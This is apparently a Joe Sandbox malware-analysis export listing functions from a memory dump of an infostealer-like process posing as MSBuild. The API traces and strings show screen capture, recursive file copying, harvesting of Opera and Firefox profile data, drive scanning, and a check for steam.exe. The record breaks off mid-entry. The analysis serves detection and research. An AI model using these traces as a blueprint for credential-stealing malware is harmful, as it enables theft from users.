Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: /$UT
API String ID: 0-1626504983
Opcode ID: 529ba8237f0014992bab19239517a34075ee691daa6caaefc8e8a53a834a0c09
Instruction ID: ceb82e4e54f3846e9f94eab9f0bc1a81f9160b51cd409ffa36bf36e6f1d1d03f
Opcode Fuzzy Hash: 529ba8237f0014992bab19239517a34075ee691daa6caaefc8e8a53a834a0c09
Instruction Fuzzy Hash: 55027EB19442688BDF21CF64CC817EEBBB5AF45304F1440EAD949AB242D6389EC5CF99

Function 00411F55 Relevance: 24.1, APIs: 16, Instructions: 147windowCOMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00411F96
GetDesktopWindow.USER32 ref: 00411FA4
GetWindowRect.USER32(00000000,?), ref: 00411FB1
GetDC.USER32(00000000), ref: 00411FB8
CreateCompatibleDC.GDI32(00000000), ref: 00411FC1
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00411FD1
SelectObject.GDI32(?,00000000), ref: 00411FDE
BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 00411FFA
GetHGlobalFromStream.COMBASE(?,?), ref: 00412049
GlobalLock.KERNEL32(?), ref: 00412052
GlobalSize.KERNEL32(?), ref: 0041205E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00405482: lstrlenA.KERNEL32(?), ref: 00405519
Part of subcall function 00405482: StrCmpCA.SHLWAPI(?,00436986,0043697B,0043697A,0043696F), ref: 00405588
Part of subcall function 00405482: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004055AA

SelectObject.GDI32(?,?), ref: 004120BC
DeleteObject.GDI32(?), ref: 004120D7
DeleteObject.GDI32(?), ref: 004120E0
ReleaseDC.USER32(00000000,00000000), ref: 004120E8
CloseWindow.USER32(00000000), ref: 004120EF

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: GlobalObject$CreateWindow$CompatibleDeleteSelectStreamlstrcpy$BitmapCloseDesktopFromInternetLockOpenRectReleaseSizelstrlen
String ID:
API String ID: 2610876673-0
Opcode ID: 785c2575682d8d340d2f67ba17a8d5b3d83946c3163a7e1a1560ca7ccc0c905a
Instruction ID: c1d95bee058df7d0eb72bc71505ae5be25a1286d1fed2c65958a37403167da66
Opcode Fuzzy Hash: 785c2575682d8d340d2f67ba17a8d5b3d83946c3163a7e1a1560ca7ccc0c905a
Instruction Fuzzy Hash: A251EA72800218AFDF15EFA1ED498EE7FBAFF08315F145425F901E2120E7369A55DB61

Function 00401D80 Relevance: 23.3, APIs: 12, Strings: 1, Instructions: 529fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

FindFirstFileA.KERNEL32(?,?,0043AA64,0043AA68,004369EE,004369EB,00417A18,?,00000000), ref: 00401FA4
StrCmpCA.SHLWAPI(?,0043AA6C), ref: 00401FD7
StrCmpCA.SHLWAPI(?,0043AA70), ref: 00401FF1
FindFirstFileA.KERNEL32(?,?,0043AA74,0043AA78,?,0043AA7C,004369EF), ref: 004020DD
CopyFileA.KERNEL32(?,?,00000001), ref: 004022C3

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

DeleteFileA.KERNEL32(?), ref: 00402336
FindNextFileA.KERNEL32(?,?), ref: 004023A2
FindClose.KERNEL32(?), ref: 004023B6
CopyFileA.KERNEL32(?,?,00000001), ref: 004025DC

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

DeleteFileA.KERNEL32(?), ref: 0040264F

Part of subcall function 00416FA7: Sleep.KERNEL32(000003E8,?,?), ref: 0041700E

FindNextFileA.KERNEL32(?,?), ref: 004026C6
FindClose.KERNEL32(?), ref: 004026DA

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Strings

\*.*, xrefs: 00401E9E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Find$lstrcpy$Close$CopyCreateDeleteFirstNextlstrcat$AllocAttributesFolderHandleLocalObjectPathReadSingleSizeSleepSystemThreadTimeWaitlstrlen
String ID: \*.*
API String ID: 1475085387-1173974218
Opcode ID: 5ec9d7e94330c494ef8d97e02669de3abc0dd461b5c13207354e91a8054b7340
Instruction ID: 6e187b3dd7c688dd3e2975bf598ceb31540ecf4cce5f896a17779636691c6a6b
Opcode Fuzzy Hash: 5ec9d7e94330c494ef8d97e02669de3abc0dd461b5c13207354e91a8054b7340
Instruction Fuzzy Hash: 1A320E71A401299BCF21FB25DD4A6CD7375AF04308F5100EAB548B71A1DBB8AFC98F98

Function 0041543D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 140stringfileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 0041546A
FindFirstFileA.KERNEL32(?,?), ref: 00415481
StrCmpCA.SHLWAPI(?,00436A80), ref: 004154A2
StrCmpCA.SHLWAPI(?,00436A84), ref: 004154BC
lstrcatA.KERNEL32(?), ref: 0041550D
lstrcatA.KERNEL32(?), ref: 00415520
lstrcatA.KERNEL32(?,?), ref: 00415534
lstrcatA.KERNEL32(?,?), ref: 00415547
lstrcatA.KERNEL32(?,00436A88), ref: 00415559
lstrcatA.KERNEL32(?,?), ref: 0041556D

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

FindNextFileA.KERNEL32(?,?), ref: 00415623
FindClose.KERNEL32(?), ref: 00415637

Strings

%s\%s, xrefs: 0041545E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
String ID: %s\%s
API String ID: 1150833511-4073750446
Opcode ID: 64224958b159b6d22f10ba55480620843db225054c2a355b86054d57ffa9fb44
Instruction ID: 497a639e9f9bed764e2b609cea13bbac8422ccb0898e6bf0b5073c566259866f
Opcode Fuzzy Hash: 64224958b159b6d22f10ba55480620843db225054c2a355b86054d57ffa9fb44
Instruction Fuzzy Hash: 4F515FB190021C9BCF64DF60CC89AC9B7BDAB48305F1044E6E609E3250EB369B85CF65

Function 0040BF4D Relevance: 19.7, APIs: 7, Strings: 4, Instructions: 420fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,\*.*,0043682E,0040CC6B,?,?), ref: 0040BFC5
StrCmpCA.SHLWAPI(?,00437470), ref: 0040BFE5
StrCmpCA.SHLWAPI(?,00437474), ref: 0040BFFF
StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

\*.*, xrefs: 0040BF73
Opera, xrefs: 0040C083
Opera GX, xrefs: 0040C091
Opera Crypto, xrefs: 0040C09F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 2567437900-1710495004
Opcode ID: 52ecbd5b4a38551fbf1eff65d9ccd163c8eed750bdefbe09ee6b3e091a2c5729
Instruction ID: 0260d5c266de210f65568f4b73986d2e2321fdcb1199aff99a3b39d86c03169e
Opcode Fuzzy Hash: 52ecbd5b4a38551fbf1eff65d9ccd163c8eed750bdefbe09ee6b3e091a2c5729
Instruction Fuzzy Hash: F4021C71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3192DBB86FC98F88

Function 00415142 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 146stringCOMMON

Download Yara Rule

APIs

GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004151C2
_memset.LIBCMT ref: 004151E5
GetDriveTypeA.KERNEL32(?), ref: 004151EE
lstrcpyA.KERNEL32(?,?), ref: 0041520E
lstrcpyA.KERNEL32(?,?), ref: 00415229

Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414D1C
Part of subcall function 00414CC8: FindFirstFileA.KERNEL32(?,?), ref: 00414D33
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D4F
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414D60
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369F8), ref: 00414D81
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,004369FC), ref: 00414D9B
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DC2
Part of subcall function 00414CC8: StrCmpCA.SHLWAPI(?,0043660F), ref: 00414DD6
Part of subcall function 00414CC8: wsprintfA.USER32 ref: 00414DFF
Part of subcall function 00414CC8: _memset.LIBCMT ref: 00414E28
Part of subcall function 00414CC8: lstrcatA.KERNEL32(?,?), ref: 00414E3D

lstrcpyA.KERNEL32(?,00000000), ref: 0041524A
lstrlenA.KERNEL32(?), ref: 004152C4

Strings

%DRIVE_REMOVABLE%, xrefs: 00415215
*%DRIVE_FIXED%*, xrefs: 0041515E
%DRIVE_FIXED%, xrefs: 00415230
*%DRIVE_REMOVABLE%*, xrefs: 0041518F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$lstrcpywsprintf$Drive$FileFindFirstLogicalStringsTypelstrcatlstrlen
String ID: %DRIVE_FIXED%$%DRIVE_REMOVABLE%$*%DRIVE_FIXED%*$*%DRIVE_REMOVABLE%*
API String ID: 441469471-147700698
Opcode ID: c9d42909db418974abad73dc19fd428f4d65fc45d37dbb9aa4a689193fe46e70
Instruction ID: ea4f15970c6a5d4b45be7a2176528fb80d3ae30a0f48c86a9c416c7322ab13a3
Opcode Fuzzy Hash: c9d42909db418974abad73dc19fd428f4d65fc45d37dbb9aa4a689193fe46e70
Instruction Fuzzy Hash: 3C512CB190021CAFDF219FA1CC85BDA7BB9FB05304F1041AAEA49A7111EB355E89CF59

Function 0040D5C6 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 229fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437570,004368A3,?,?,?), ref: 0040D647
StrCmpCA.SHLWAPI(?,00437574), ref: 0040D668
StrCmpCA.SHLWAPI(?,00437578), ref: 0040D682
StrCmpCA.SHLWAPI(?,prefs.js,0043757C,?,004368AE), ref: 0040D70E

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

CopyFileA.KERNEL32(?,?,00000001), ref: 0040D7E8
DeleteFileA.KERNEL32(?), ref: 0040D8B3
FindNextFileA.KERNELBASE(?,?), ref: 0040D956
FindClose.KERNEL32(?), ref: 0040D96A

Strings

prefs.js, xrefs: 0040D702

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextSystemTimelstrlen
String ID: prefs.js
API String ID: 893096357-3783873740
Opcode ID: bfb07b7c417370cc65cdf3c113b30ca7fb62479600deee231d6f3beb901ab667
Instruction ID: 52904dbdec7a8812f0d6252b7ecd21146621a6019d038770ccdf13318407303e
Opcode Fuzzy Hash: bfb07b7c417370cc65cdf3c113b30ca7fb62479600deee231d6f3beb901ab667
Instruction Fuzzy Hash: D3A10C71D001289BCF60FB65DD46BCD7375AF04318F4141EAA808B7292DB79AEC98F99

Function 0040B5DF Relevance: 13.7, APIs: 9, Instructions: 217fileCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

FindFirstFileA.KERNEL32(?,?,00437424,00436822,?,?,?), ref: 0040B657
StrCmpCA.SHLWAPI(?,00437428), ref: 0040B678
StrCmpCA.SHLWAPI(?,0043742C), ref: 0040B692
StrCmpCA.SHLWAPI(?,00437430,?,00436823), ref: 0040B71F
StrCmpCA.SHLWAPI(?), ref: 0040B780

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 0040ABE5: CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A

FindNextFileA.KERNELBASE(?,?), ref: 0040B8EB
FindClose.KERNEL32(?), ref: 0040B8FF

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$FileFind$lstrcat$CloseCopyFirstNextlstrlen
String ID:
API String ID: 3801961486-0
Opcode ID: 2f9eaede6a784df842a591c25a0cd1165b2f0564e05c296c23f42ffc82e080ae
Instruction ID: e9d49ef9ce8a2bc9a117d4fe253b15a3b51ee7ef692749dde95bb5dd1480248d
Opcode Fuzzy Hash: 2f9eaede6a784df842a591c25a0cd1165b2f0564e05c296c23f42ffc82e080ae
Instruction Fuzzy Hash: A0812C7290021C9BCF20FB75DD46ADD7779AB04308F4501A6EC48B3291EB789E998FD9

Function 004124A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 39processCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 004124B2
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004124D4
Process32First.KERNEL32(00000000,00000128), ref: 004124E4
Process32Next.KERNEL32(00000000,00000128), ref: 004124F6
StrCmpCA.SHLWAPI(?,steam.exe), ref: 00412508
CloseHandle.KERNEL32(00000000), ref: 00412521

Strings

steam.exe, xrefs: 004124B7, 00412500

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
String ID: steam.exe
API String ID: 1799959500-2826358650
Opcode ID: 1e05f0965f72d128c620ac0fa61a73bdd70f09bb6f681c8712c2487e80381a4f
